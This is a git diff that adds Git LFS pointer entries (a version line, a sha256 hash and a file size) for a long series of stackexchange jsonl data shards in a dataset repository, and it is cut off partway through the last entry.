index 0000000000000000000000000000000000000000..c2f3834139c8505695332f0d101615ccccc40546 --- /dev/null +++ b/data/stackexchange/1-1/2021_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90e61194e408ff0662002fcc5ac1d80c443fa7653970ebf18903ed322c394d9d +size 40240099 diff --git a/data/stackexchange/1-1/2022_2289.jsonl b/data/stackexchange/1-1/2022_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1275e5c745d31f04470e1f968558ce93b9016108 --- /dev/null +++ b/data/stackexchange/1-1/2022_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f91176b9260399787823675ae479867d8393546fffb1ee9c872d409268dc687 +size 39500616 diff --git a/data/stackexchange/1-1/2023_2289.jsonl b/data/stackexchange/1-1/2023_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89e87cc4ca3206a6eec51ae3eb17a1b8a6c69991 --- /dev/null +++ b/data/stackexchange/1-1/2023_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73e06de58856eaa5d68b8245b88bc4df4ff13452df8dccb281cc0293ab7c9bc1 +size 39890168 diff --git a/data/stackexchange/1-1/2024_2289.jsonl b/data/stackexchange/1-1/2024_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f180c41fab9f44b5897e892c4853647ea3e22464 --- /dev/null +++ b/data/stackexchange/1-1/2024_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:86a6595d39d1536b98043fd0b0f0b11496dbfbc5c9cd291edeb91b8804065387 +size 42247304 diff --git a/data/stackexchange/1-1/2025_2289.jsonl b/data/stackexchange/1-1/2025_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fec36d2becc17143e780306f256ce073f7088886 --- /dev/null +++ b/data/stackexchange/1-1/2025_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8eb5b27c8775c0a7176237bc2d4674dcca7abc712b5fe95f400e034af03d54d6 +size 41534599 diff --git a/data/stackexchange/1-1/2026_2289.jsonl b/data/stackexchange/1-1/2026_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba51bf49c0be1e54718293a258766e56b03b8d3b --- /dev/null +++ b/data/stackexchange/1-1/2026_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:261039376f59a4fa2ebfbabd45885312c055c09517b4fd6a4390d20d04b6e474 +size 39763074 diff --git a/data/stackexchange/1-1/2027_2289.jsonl b/data/stackexchange/1-1/2027_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..905e1488cfec93d778c2fae79b16eecb8c9bc131 --- /dev/null +++ b/data/stackexchange/1-1/2027_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f469f0b0f8d7220ed642b3e9b98290e7ee8df6b025d17a0164f40402591daf6b +size 40684238 diff --git a/data/stackexchange/1-1/2028_2289.jsonl b/data/stackexchange/1-1/2028_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dde56003ea14a0d9e60acb0418ea6e6a2fffd52 --- /dev/null +++ b/data/stackexchange/1-1/2028_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32c42ea84ed199e00ce86a0de18b9ee81e946ac37483b201e049262844b4d88c +size 39861929 diff --git a/data/stackexchange/1-1/2029_2289.jsonl b/data/stackexchange/1-1/2029_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c90d05429ba5a0f9a365ae83f8416a2a78dce192 --- /dev/null +++ b/data/stackexchange/1-1/2029_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51035e7aa670fb1d6fbde8370bbad430b7d166f986544e7116ea5b7f463deec4 +size 40842008 diff --git a/data/stackexchange/1-1/202_2289.jsonl b/data/stackexchange/1-1/202_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..01de695a9392d1abcc91d20e525a3c9e97771453 --- /dev/null +++ b/data/stackexchange/1-1/202_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a983234a7a3512ac4df6a1665b7f99354c02cef9f98ec594c6e96bc40a6f17a0 +size 38374222 diff --git a/data/stackexchange/1-1/2030_2289.jsonl b/data/stackexchange/1-1/2030_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e25dfeec0de3072c76a35cfa2de5f16e7bfef1c5 --- /dev/null +++ b/data/stackexchange/1-1/2030_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:678668bef482a0a5d37fee52a0e303aa2778516c5f5194f90b2c18be30d5ce06 +size 39425646 diff --git a/data/stackexchange/1-1/2031_2289.jsonl b/data/stackexchange/1-1/2031_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37954af3e3b59f152b36b801d66d02c5b6f8ac76 --- /dev/null +++ b/data/stackexchange/1-1/2031_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1347d0e5cf1578569ecce74abf7d0d6c2fce77bbf38fe25852342a973628c302 +size 40583815 diff --git a/data/stackexchange/1-1/2032_2289.jsonl b/data/stackexchange/1-1/2032_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..59f82462e1358539b7a8faa26a444c58615f285d --- /dev/null +++ b/data/stackexchange/1-1/2032_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:229a04e5a238abf493e19533de7eda005b95ef987b2f2a59d6e2298115f639e1 +size 39762106 diff --git a/data/stackexchange/1-1/2033_2289.jsonl b/data/stackexchange/1-1/2033_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c47e664490bfd5d17c8a1fd412135cd8b305826 --- /dev/null +++ b/data/stackexchange/1-1/2033_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eac42f74c7046c8c095c41a76d53b6d2cdb18a20e965f04c5f7ee7e225d42cc9 +size 39193360 diff --git a/data/stackexchange/1-1/2034_2289.jsonl b/data/stackexchange/1-1/2034_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11455607ef3a368eade9a675c4b2f97dcf4752f1 --- /dev/null +++ b/data/stackexchange/1-1/2034_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dbd5b77dce1bf21a214ed5a4fb3928dee8bf618c98e26027679f1243706c01a2 +size 39492435 diff --git a/data/stackexchange/1-1/2035_2289.jsonl b/data/stackexchange/1-1/2035_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26c844c253d4e8812517963cd49d8d1c143d7311 --- /dev/null +++ b/data/stackexchange/1-1/2035_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f3a82dcf44d15a2dac1f67087e0a0bf7f67fd910524b8b493775cc740ff384f +size 39732033 diff --git a/data/stackexchange/1-1/2036_2289.jsonl b/data/stackexchange/1-1/2036_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f28f3b2bf2c2d64ee3081e6f93b6686a51106997 --- /dev/null +++ b/data/stackexchange/1-1/2036_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fb32bd919b7e1163e01c4f769d7cba2150c917e01ebc5f3fb86485e37279dec +size 40172353 diff --git a/data/stackexchange/1-1/2037_2289.jsonl b/data/stackexchange/1-1/2037_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..809fbe87b347614ff756c85244ff948c0224bb94 --- /dev/null +++ b/data/stackexchange/1-1/2037_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41b8ae0b843c25701a342626488724c51a546fc1ef3bfceb306853d576f578fd +size 41343182 diff --git a/data/stackexchange/1-1/2038_2289.jsonl b/data/stackexchange/1-1/2038_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12ad51f648fd48d7503f6a4125cbd1bb5e1c2201 --- /dev/null +++ b/data/stackexchange/1-1/2038_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0856476498f2b461f23b93517a1d419b55ad948488c419c1956ff2f3e4aa788a +size 40055455 diff --git a/data/stackexchange/1-1/2039_2289.jsonl b/data/stackexchange/1-1/2039_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a41f6edd35fdd1ab64cac7b3982dc8bc5d36dc9 --- /dev/null +++ b/data/stackexchange/1-1/2039_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80119139aef921af75aa261eaeed13b8fbef991056fc2862defd13ce37d299d8 +size 39007033 diff --git a/data/stackexchange/1-1/203_2289.jsonl b/data/stackexchange/1-1/203_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05ced0abb6c6566820df77cb1008af915932f979 --- /dev/null +++ b/data/stackexchange/1-1/203_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:42c6eac85ff752ce44085065b784e7d49b343f64f5b0b1667c69e2dab18ae011 +size 37156435 diff --git a/data/stackexchange/1-1/2040_2289.jsonl b/data/stackexchange/1-1/2040_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dff34861e5cfdef5c52a4e17c4a9b9233dc646ea --- /dev/null +++ b/data/stackexchange/1-1/2040_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d95a5eeaabcc7629957be1bd8e4a9808dcf098704a65ff087fcb70095f7a214f +size 39893795 diff --git a/data/stackexchange/1-1/2041_2289.jsonl b/data/stackexchange/1-1/2041_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a92022820bc0f5b2fd58942b8d7833a4e7cbd4c --- /dev/null +++ b/data/stackexchange/1-1/2041_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9ceff97c58d1fad9fc764df0c999f4d50d71a0cdc278bd073730f88a8413a9c +size 39114761 diff --git a/data/stackexchange/1-1/2042_2289.jsonl b/data/stackexchange/1-1/2042_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6753b196958f6959bc24d91369036b630ed54f1 --- /dev/null +++ b/data/stackexchange/1-1/2042_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee21d900a453d64ec22311c481ba647b392b07c6df06e9c111022c416a6b4de8 +size 39235242 diff --git a/data/stackexchange/1-1/2043_2289.jsonl b/data/stackexchange/1-1/2043_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af300fbf20e383601eadd64ba26b53051c8c7cde --- /dev/null +++ b/data/stackexchange/1-1/2043_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb670b47ced96d0903bb805c4cf3d7a2f40c65f3d88e6b5c5181f947f19790ed +size 39519623 diff --git a/data/stackexchange/1-1/2044_2289.jsonl b/data/stackexchange/1-1/2044_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c9502590df82338787b6475c684b97fffe98d6f --- /dev/null +++ b/data/stackexchange/1-1/2044_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82d28b701f6909129975d7927d251efcac341f35ffcfe5f19b08a9e2f1fcb361 +size 38810232 diff --git a/data/stackexchange/1-1/2045_2289.jsonl b/data/stackexchange/1-1/2045_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f1a773d5704418d63452795bdbe1460bafd8852 --- /dev/null +++ b/data/stackexchange/1-1/2045_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf67beda7c701fe49cb4e2926bf2b2c97006d440c11cdc8d00d2f732897f7b72 +size 39888754 diff --git a/data/stackexchange/1-1/2046_2289.jsonl b/data/stackexchange/1-1/2046_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..824cf80c06121b052a68c7bb38a213270c9f1e24 --- /dev/null +++ b/data/stackexchange/1-1/2046_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31b0e746fc9cda330d9fc5405fca7639dc85832f7139fa67776e6cfe8f3b2dcb +size 38740484 diff --git a/data/stackexchange/1-1/2047_2289.jsonl b/data/stackexchange/1-1/2047_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c89a6a03a5750c60c96fb4dda11c2f49ab5f93d6 --- /dev/null +++ b/data/stackexchange/1-1/2047_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e3098a48d9e22dcda0563df1035c63c0a9004329411ed679f3aaa5083a0c929 +size 38722288 diff --git a/data/stackexchange/1-1/2048_2289.jsonl b/data/stackexchange/1-1/2048_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..772f8441275cea49834c62e4388ac9129fe20ed4 --- /dev/null +++ b/data/stackexchange/1-1/2048_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5bbd0c1982bc734dc587bea1f09728387facb1f4413508990459403739e42371 +size 38871674 diff --git a/data/stackexchange/1-1/2049_2289.jsonl b/data/stackexchange/1-1/2049_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab760fb59e2dad8a2d9051813a514012c76243a5 --- /dev/null +++ b/data/stackexchange/1-1/2049_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfd560b18e68be8b88caa35ceba208d0f3cf9930eb4df8458d6e1569d90f4a6b +size 38705944 diff --git a/data/stackexchange/1-1/204_2289.jsonl b/data/stackexchange/1-1/204_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c13548ef80b073a032b9c53e1746cb8c41b5b3c2 --- /dev/null +++ b/data/stackexchange/1-1/204_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d74a248cc329eec2649e6bb3c50d958a9280957c3485055299bbcd7b7d1cfab +size 37938146 diff --git a/data/stackexchange/1-1/2050_2289.jsonl b/data/stackexchange/1-1/2050_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec0d95be417965fd49d045a22ae9d355fcb7aa28 --- /dev/null +++ b/data/stackexchange/1-1/2050_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8d4106adbcb563806b5c2db9508bf373d3ce55346cf3967d2898d13803cdf2e +size 38940949 diff --git a/data/stackexchange/1-1/2051_2289.jsonl b/data/stackexchange/1-1/2051_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fab369c98bb0b86a15b22af37eaac63c18ce4c7 --- /dev/null +++ b/data/stackexchange/1-1/2051_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bb072b0b31cbf239886df28fabaab2221e9ab5ec5d7ba78fafcd3079b51ecf8 +size 38994116 diff --git a/data/stackexchange/1-1/2052_2289.jsonl b/data/stackexchange/1-1/2052_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..432f90213f06ec49b60477769ebd06bdc55c537e --- /dev/null +++ b/data/stackexchange/1-1/2052_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0d5ad29841fbe35c5c35214ab9909705c7300f2ffd0b3baaabd3c4a13aaea47b +size 39174012 diff --git a/data/stackexchange/1-1/2053_2289.jsonl b/data/stackexchange/1-1/2053_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..658703d881f6b1405ac89f101214e91bcaf4cd76 --- /dev/null +++ b/data/stackexchange/1-1/2053_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdef2ce54022630bfabc54c1f39839d1a5f4bebb4ea988165bd550d8193842aa +size 39031404 diff --git a/data/stackexchange/1-1/2054_2289.jsonl b/data/stackexchange/1-1/2054_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..55c68cefc9613ee352e32095cd45c5d56230e5a7 --- /dev/null +++ b/data/stackexchange/1-1/2054_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81cc9db832dede293a59f9bf7c78c583fff25647499e0eadd22c69135e598b97 +size 38761067 diff --git a/data/stackexchange/1-1/2055_2289.jsonl b/data/stackexchange/1-1/2055_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0349625032831c7b8e8fee29529177447b459a6 --- /dev/null +++ b/data/stackexchange/1-1/2055_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:2bcc1f4459d8a2bebe095f5bc4a74ac45c649547510d51defcfb96472e1929d3 +size 38886667 diff --git a/data/stackexchange/1-1/2056_2289.jsonl b/data/stackexchange/1-1/2056_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cde9f8f85eb1ae7bba8690fa3d0bbf99bc7c70db --- /dev/null +++ b/data/stackexchange/1-1/2056_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ec1748e3fc62842aaeee6f19857eadfe52c22510dbe78d281b4ef70e7f9053b +size 39615570 diff --git a/data/stackexchange/1-1/2057_2289.jsonl b/data/stackexchange/1-1/2057_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae6c3265cc77f21c8db5f40d3c24e6506811a72d --- /dev/null +++ b/data/stackexchange/1-1/2057_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc644a12de0a0b471d75df68c1a20c17101c6bbcd5e083cb035dd8a79d91f167 +size 38923838 diff --git a/data/stackexchange/1-1/2058_2289.jsonl b/data/stackexchange/1-1/2058_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..001c870988dedebc8da03151788d9f5d287e0f53 --- /dev/null +++ b/data/stackexchange/1-1/2058_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:faf1ca0a647b131ea37efc8df8df0d04b027f370b992369af5cbd861d61bb718 +size 40038985 diff --git a/data/stackexchange/1-1/2059_2289.jsonl b/data/stackexchange/1-1/2059_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36a8c0fe757870431c7180d50b78059d956f4a2c --- /dev/null +++ b/data/stackexchange/1-1/2059_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:686196d9a8124baa6825ea9b880d30ce56b2c2d5ddce4704fc29dbd47180db05 +size 39994879 diff --git a/data/stackexchange/1-1/205_2289.jsonl b/data/stackexchange/1-1/205_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8b2ea547655080c95a2b7a6ef2d327d0fa8599b --- /dev/null +++ b/data/stackexchange/1-1/205_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:866e48cf8c5753d3bd193bd0aae786cd4bcd709735a07a6369bf5840747cffd1 +size 38437801 diff --git a/data/stackexchange/1-1/2060_2289.jsonl b/data/stackexchange/1-1/2060_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58f47806a76d24b8c8e92f35d1d1d7eee0ad9eb1 --- /dev/null +++ b/data/stackexchange/1-1/2060_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a0cf9fd27738754401e0bbcbbd40ce92e521a822394ee20676b297d71d5f27a +size 39228918 diff --git a/data/stackexchange/1-1/2061_2289.jsonl b/data/stackexchange/1-1/2061_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37df1891e5134bdb9c773f8cc74edb4fbdfc0021 --- /dev/null +++ b/data/stackexchange/1-1/2061_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:970f76885e4a34bd3ebbebc59e9ad5a6610f44f0ac863de7c9a27dd2ce47e135 +size 38992269 diff --git a/data/stackexchange/1-1/2062_2289.jsonl b/data/stackexchange/1-1/2062_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59639ff1edc17a79a227d0faf70474fa06e15105 --- /dev/null +++ b/data/stackexchange/1-1/2062_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:912a8d843a659ab245964452ef9ed45f2a56bf3db84b6dbb521859d88615748a +size 39250747 diff --git a/data/stackexchange/1-1/2063_2289.jsonl b/data/stackexchange/1-1/2063_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..f365d6d6213db433d7ea78a09b46406c47929f4c --- /dev/null +++ b/data/stackexchange/1-1/2063_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bd07edb110167f09429a06cfb31c1c86eb4054422b9acc095f531284c757d62 +size 38751543 diff --git a/data/stackexchange/1-1/2064_2289.jsonl b/data/stackexchange/1-1/2064_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..708083c82949658a3be14fa93c0b4fae1cff2ea4 --- /dev/null +++ b/data/stackexchange/1-1/2064_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ab74fbc7464e1e2e0ee2d5491ec17f8d4ba87546f5d61ee3346e0202ba6ab59 +size 39981901 diff --git a/data/stackexchange/1-1/2065_2289.jsonl b/data/stackexchange/1-1/2065_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1b115bfa2ee1ef42eaa90ec084f020be6b9e90c1 --- /dev/null +++ b/data/stackexchange/1-1/2065_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fde7584820c456dea146cbf28d02e3c5aaa5bea966888baf45c22455ead192e6 +size 39624623 diff --git a/data/stackexchange/1-1/2066_2289.jsonl b/data/stackexchange/1-1/2066_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28b9dfebd50517f8e6442f33535d82fcabf8f01c --- /dev/null +++ b/data/stackexchange/1-1/2066_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:053453785870d99ca54bad46adf1deebdc35bf79e30175dac60d47f5b82bc27e +size 39142612 diff --git a/data/stackexchange/1-1/2067_2289.jsonl b/data/stackexchange/1-1/2067_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc6b310abad3f20691a4e2983966cb1cbb36d798 --- /dev/null +++ b/data/stackexchange/1-1/2067_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9e98680e20fddfa2b3f27b158a7985d078da7080c580e73c2c7774f87dc0d05 +size 39145624 diff --git a/data/stackexchange/1-1/2068_2289.jsonl b/data/stackexchange/1-1/2068_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2879e8adecfc16e610e9723f924bd6affd64ed01 --- /dev/null +++ b/data/stackexchange/1-1/2068_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2aa97a63bda8819075babf3d4fd99189c0bcf38c8b1ffac1d73a7c3b229b3b49 +size 39224122 diff --git a/data/stackexchange/1-1/2069_2289.jsonl b/data/stackexchange/1-1/2069_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0df214442c29769ee1dab47e6d2c115ee91f0f39 --- /dev/null +++ b/data/stackexchange/1-1/2069_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51f7118125b73d89d9b13c93d456043f1c027a69539bebd873b94a9afb7730ec +size 39364206 diff --git a/data/stackexchange/1-1/206_2289.jsonl b/data/stackexchange/1-1/206_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0624595b44ac950cb190a8947c574b74b3aea68 --- /dev/null +++ b/data/stackexchange/1-1/206_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec156ae6e7873e106f9ebb3951d27aecf0048b053aba88ac5ef317da510065ed +size 37893870 diff --git a/data/stackexchange/1-1/2070_2289.jsonl b/data/stackexchange/1-1/2070_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2a1905bd8895d4e974423dbc09c656f27b9a22b --- /dev/null +++ b/data/stackexchange/1-1/2070_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:bcd8e46784add5706efdaf048523ce6c5d34006006477f1947cfe7e596657913 +size 38795338 diff --git a/data/stackexchange/1-1/2071_2289.jsonl b/data/stackexchange/1-1/2071_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca228f895e46bc32d0f3cf969bf1d7e599dffd67 --- /dev/null +++ b/data/stackexchange/1-1/2071_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d1952321e58d4ea157f68898a342e718b6ffb958540d015ef59f7c8065a0c7c +size 39723761 diff --git a/data/stackexchange/1-1/2072_2289.jsonl b/data/stackexchange/1-1/2072_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dfbd3b9a3eb963a3121091bc29a02bce30101e3b --- /dev/null +++ b/data/stackexchange/1-1/2072_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:987bdea4ee20a22384ea72a1f10fdb5b3a10ae58fc52fcbd3d590e57154a5a38 +size 39390656 diff --git a/data/stackexchange/1-1/2073_2289.jsonl b/data/stackexchange/1-1/2073_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6dff17a480b61a6df8c7b07ceab04f0b3f6fef86 --- /dev/null +++ b/data/stackexchange/1-1/2073_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff867d18af82fea4094bfed8383cd77abc32f093e9542da6c4b33fa8f78e3a06 +size 38866050 diff --git a/data/stackexchange/1-1/2074_2289.jsonl b/data/stackexchange/1-1/2074_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f02941c8a4317f7cc5ff18b53317c827f39a6234 --- /dev/null +++ b/data/stackexchange/1-1/2074_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e40c5cd0302bc85476211ea7322ec9ca08fed65030ed6e92e632ef2993b6308f +size 39318501 diff --git a/data/stackexchange/1-1/2075_2289.jsonl b/data/stackexchange/1-1/2075_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..732e2e56eb9927c841c85b5f50f8c1733c6adbee --- /dev/null +++ b/data/stackexchange/1-1/2075_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c40dd895be4f223807adc12e14fb23242797c4f95a3fce4a8b85f2fd1b7c0586 +size 38743805 diff --git a/data/stackexchange/1-1/2076_2289.jsonl b/data/stackexchange/1-1/2076_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a16a68f198c37acca69274944a74258eceb3b7b3 --- /dev/null +++ b/data/stackexchange/1-1/2076_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b79d06b55c20fd79ea44981c34beb2916b8a0ab4fddd6d3226dd2e2ea1ee271 +size 38935237 diff --git a/data/stackexchange/1-1/2077_2289.jsonl b/data/stackexchange/1-1/2077_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d396d5ddfd5c35397f7b15e03aaf6e4f3ec44d96 --- /dev/null +++ b/data/stackexchange/1-1/2077_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cca3c2fc336cd3af1a5677e2c778a440279a9898a154ec485d927fd31d460fbe +size 39300458 diff --git a/data/stackexchange/1-1/2078_2289.jsonl b/data/stackexchange/1-1/2078_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9bcf362b9181649a5ba1311698352dbec900bf80 --- /dev/null +++ b/data/stackexchange/1-1/2078_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9422c7a558c13af3a042c28ae4f18d43920ae049c1594d5a2e07bf3255cd180 +size 39513482 diff --git a/data/stackexchange/1-1/2079_2289.jsonl b/data/stackexchange/1-1/2079_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..2279ae9ea8ee07204a442dd651dc021236f67480 --- /dev/null +++ b/data/stackexchange/1-1/2079_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:215823a4a8a4616af96d8e6b5e145634ce772100055b679d128a06646d3bd088 +size 39437381 diff --git a/data/stackexchange/1-1/207_2289.jsonl b/data/stackexchange/1-1/207_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88b51db1289f40f6bf42e525dd8c4cbf81e7c384 --- /dev/null +++ b/data/stackexchange/1-1/207_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ec8a3f85a0290701adbc397bb6705bcccea1eeb262acb52dfa9d2cfd8e24d32 +size 37578969 diff --git a/data/stackexchange/1-1/2080_2289.jsonl b/data/stackexchange/1-1/2080_2289.jsonl new file mode 100644 index 